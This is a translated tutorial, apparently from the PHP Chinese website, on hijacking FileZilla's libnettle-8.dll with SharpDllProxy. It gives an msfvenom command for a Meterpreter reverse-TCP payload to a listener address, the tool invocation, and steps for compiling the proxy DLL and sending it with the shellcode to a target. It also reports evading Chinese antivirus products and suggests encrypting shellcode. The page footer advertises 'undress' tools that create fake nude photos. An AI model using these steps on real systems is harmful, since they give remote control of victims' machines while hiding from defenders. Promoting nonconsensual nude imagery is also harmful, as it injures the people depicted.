How to perform DLL proxy forwarding and weiquan analysis
DLL Hijacking
After the Windows 7 version, the system uses KnowDLLs to manage DLLs, which is located in the registry HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs. The following DLL file It will be prohibited to call from the directory where the exe itself is located, but can only be called from the system directory (System32) directory. The reason for DLL hijacking is that not all DLLs are written to the registry.
Use the dll generated by msfvenom to kill directly. 
SharpDllProxy
The name sounds similar to a socks proxy. Tool source from: https://redteaming.co.uk/2020/07/12/dll-proxy-loading-your-favorite-c-implant/. For specific implementation, you can also refer to this boss’s blog.
Preface
First understand the operating principle of the dynamic link library. If application A wants to use the GetFunkyData() function in the dynamic link library DataFunctions.dll, it needs to load the DataFunctions.dll dynamic link library. This tool is based on this consideration. It creates a dynamic link library with the same name as DataFunction.dll. It has two functions: ① Make a shortcut key to forward all functions to the real dynamic link library DataFunctions.dll. , this is the origin of proxy in the name; ② Write shellcode in this fake DataFunctions.dll. Attached is the author's original picture: 
Experimental process
Target program
It took some time to do this experiment, such as FileZilla software, how to find this that needs to be loaded What about dll? As the author said, copy the software and you will know what it is missing. As follows: 
That means the DLL file needs to be loaded to run the application, so make a fake libnettle-8.dll for this DLL.
Generate shellcode
<br>
<br>
msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.124.29 LPORT=4444 -f raw > shell.bin
The experiment begins
First download SharpDllProxy: https://github.com/Flangvik/SharpDllProxy, and then use visual studio 2019 to compile it. Try not to use other versions, because I used various visual studio 2017 It took a long time to report the error but it didn’t come out. There may be something wrong with the environment.
Directly use vs to open SharpDllProxy under the file --> Generate solution
Use SharpDllProxy.dll to create a fake libnettle-8.dll file. Place shell.bin and the Dll that needs to be faked into the file in the picture above. Execute the following command: .\SharpDllProxy.exe --dll libnettle-8.dll --payload shell.bin
The generated file contains a C file and a dll. This dll file is the original libnettle-8.dll file. 
Let’s analyze this C language program. From line 9 to line 494, they are all functions that forward the DLL. All functions that need to be run are forwarded to the original DLL for processing. 
Line 497 is where we inserted the shellcode. This is the only key code. In fact, you can also directly write the shellcode shell.bin to the file, which reduces the number of suspicious files. Here, we read and execute the shellcode in binary mode through VirtualAlloc memory operation. At this point, you can operate like a tiger by yourself, and use various anti-killing postures, such as changing the loading method, such as encrypting the shellcode first and then decrypting it to run. 
Use VS to compile the above C file. Select New under the File menu, then select Dynamic Link Library Project and name the project libnettle-8. Copy the above C file code to VS to compile
Send the above three files (tmpD475.dll, libnettle-8.dll, shell.bin) to the target system. Use msf to listen, then run the program, and the session will be returned. 
Using the most commonly used anti-virus software: 360, Tinder and Safe Manager were not detected. 
The above is the detailed content of How to perform DLL proxy forwarding and weiquan analysis. For more information, please follow other related articles on the PHP Chinese website!
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
AI Hentai Generator
Generate AI Hentai for free.
Hot Article
Hot Tools
Notepad++7.3.1
Easy-to-use and free code editor
SublimeText3 Chinese version
Chinese version, very easy to use
Zend Studio 13.0.1
Powerful PHP integrated development environment
Dreamweaver CS6
Visual web development tools
SublimeText3 Mac version
God-level code editing software (SublimeText3)
Hot Topics
Nvgpucomp64.dll causes Windows PC games to crash;
Mar 26, 2024 am 08:20 AM
If Nvgpucomp64.dll is causing your game to crash frequently, the solutions provided here may help you. This problem is usually caused by outdated or corrupted graphics card drivers, corrupted game files, etc. Fixing these issues can help you deal with game crashes. The Nvgpucomp64.dll file is associated with NVIDIA graphics cards. When this file crashes, your game will crash too. This usually happens in games like LordsoftheFallen, LiesofP, RocketLeague, and ApexLegends. Nvgpucomp64.dll crashes games on Windows PC if N
Analysis of the problem that the CoreMessaging.dll file is missing in the Windows system directory
Feb 11, 2024 pm 11:42 PM
Many users will be prompted that coremessaging.dll is missing when using their computers to play games. I believe that many users will immediately think that there is a problem with the software or the game. In fact, it is not. This is because the computer is missing the dll file. , users can download the coremessaging.dll file. Let this site carefully introduce to users the analysis of the problem that the CoreMessaging.dll file in the Windows system directory is missing and cannot be found. Analysis of the problem that the CoreMessaging.dll file in the Windows system directory is missing and cannot be found 1. Download the CoreMessaging.dll file 2.
How to solve the problem of missing libcurl.dll in win7 system? Win7 cannot find libcurl.dll file solution
Feb 12, 2024 am 08:15 AM
How to solve the problem of missing libcurl.dll in win7 system? Generally, dll files will cause some programs to be unable to be used normally. Faced with this problem, many users do not know how to solve it. In response to this situation, today the editor will share a detailed solution with the majority of users. I hope that win7 will be used today. Tutorials can help a large number of users, so let’s take a look. Solution to missing libcurl.dll in win7 system 1. Download the libcurl.dll file. 2. After downloading, put the file into the corresponding folder. The paths for 32-bit and 64-bit operating systems are as follows: For 32-bit Win7 operating system, copy the file directly to C:\Windows\SYSTEM32
What should I do if vcruntime140_1.dll cannot continue to execute code?
Feb 11, 2024 pm 05:00 PM
vcruntime140_1.dll is a component of the Visual C runtime library. Many users have encountered the error that vcruntime140_1.dll cannot continue to execute code when using Microsoft Visual Studio for development. So what should users do if they encounter this problem? Let this site carefully introduce to users how to solve the problem that vcruntime140_1.dll cannot continue to execute code. Reasons why vcruntime140_1.dll is lost Uninstalling the VisualC runtime library: Misoperation or upgrading VisualC results in the runtime library being lost. Virus infection: Malware deletes or damages vc
What to do if Win7 prompts that Skidrow.dll is missing from the computer when starting the game?
Feb 15, 2024 pm 02:12 PM
Many users like to use computers to play games. Recently, some users of Win7 system have reported that when starting the game, they encountered a pop-up window prompting that the Skidrow.dll file is missing in the computer and cannot be started. The game cannot be loaded normally. What is going on? ? In response to this problem, this article brings a detailed solution to share with everyone, let’s take a look. What to do if Win7 prompts that Skidrow.dll is missing from the computer when starting the game? 1. Download the Skidrow.dll file. 2. Unzip the folder and copy the Skidrow.dll file to the system directory. 32-bit systems: C:\WINNT\System 324-bit systems: C:\Windows\SysWOW
What to do if loading dll fails
Jan 25, 2024 pm 05:51 PM
Solution: 1. Re-download or obtain the DLL file from a reliable source; 2. Check the dependencies of the DLL file; 3. Make sure you are using the correct DLL version; 4. Register the DLL file; 5. Check the firewall and security software settings ; 6. Contact the software supplier or technical support.
How does Master Lu repair dll files? Master Lu's one-click tutorial on repairing missing dlls
Mar 14, 2024 pm 07:31 PM
Master Lu is a hardware detection tool used by many users. Detailed hardware information can be viewed through the software, but it has many functions that can repair multiple drivers. Many people want to know whether Master Lu can repair dll files? How to fix it? Regarding this problem, the editor of this software tutorial will explain it to you. Friends who want to know more are welcome to check it out. Tutorial on Master Lu’s one-click repair of all missing DLLs: 1. First open Master Lu and enter the main interface. 2. Next, click the game library in the upper right corner, and then click Repair in the upper right corner. 3. The last step is to repair the missing dll file.
Understand the role of VCRUNTIME140.dll
Dec 23, 2023 pm 11:17 PM
What kind of file is VCRUNTIME140.dll? Why does the computer lose VCRUNTIME140.dll when running some games, and then the game fails to run? This dll file is an important runtime library file of the computer. If it is lost, many programs will not be able to run. What is VCRUNTIME140.dll? It is one of the files in the VC++2015 runtime library. 1. VCRUNTIME140.dll is an important file necessary for the operation of Microsoft windows system. 2. Different programs in the computer require different dll files to support their operation. 3. When the computer is running the program, a message indicating that the VCRUNTIME140.dll file is missing appears.
